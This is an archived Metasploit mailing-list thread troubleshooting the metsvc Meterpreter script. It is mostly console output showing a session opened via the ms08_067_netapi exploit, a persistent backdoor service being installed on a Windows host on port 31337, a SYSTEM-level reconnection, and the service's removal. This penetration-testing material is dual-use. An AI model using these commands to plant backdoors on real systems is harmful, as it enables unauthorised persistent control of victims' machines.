Metasploit mailing list archives

Re: Problems with metsvc


From: David Gomes <skysbsb () gmail com>
Date: Tue, 20 Oct 2009 19:54:15 -0200

[*] Meterpreter session 1 opened (192.168.1.70:3244 -> 192.168.1.74:1042)

meterpreter > run metsvc -A
[-] Error while running command run: compile error
/pentest/exploits/fm3/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:358:
syntax error, unexpected ')'
meterpreter > run metsvc
[-] Error while running command run: compile error
/pentest/exploits/fm3/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:358:
syntax error, unexpected ')'
meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@skys-laptop:/pentest/exploits/fm3# svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7217
Node Kind: directory
Schedule: normal
Last Changed Author: hdm
Last Changed Rev: 7217
Last Changed Date: 2009-10-20 18:31:14 -0200 (Tue, 20 Oct 2009)

root@skys-laptop:/pentest/exploits/fm3#

On Tue, Oct 20, 2009 at 5:48 PM, HD Moore <hdm () metasploit com> wrote:

Update svn and give the new script a shot:

meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\DEVELO~1
\LOCALS~1\Temp\BQBDrWfpwyuu...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
[*]      * Installing service metsvc
 * Starting service

[*] Trying to connect to the Meterpreter service at
192.168.0.120:31337...
meterpreter >

[*] Meterpreter session 8 opened (192.168.0.136:50178 ->
192.168.0.120:31337)

meterpreter > exit
[*] Meterpreter session 7 closed.


msf exploit(handler) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run metsvc -r
[*] Removing the existing Meterpreter service
[*] Creating a temporary installation directory C:\WINDOWS\TEMP
\urOpVtqtmilyRj...
[*]  >> Uploading metsvc.exe...
[*] Stopping the service...
[*]      * Stopping service metsvc
 * Removing service
Service metsvc successfully removed.

meterpreter > exit

[*] Meterpreter session 8 closed.
msf exploit(handler) >



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: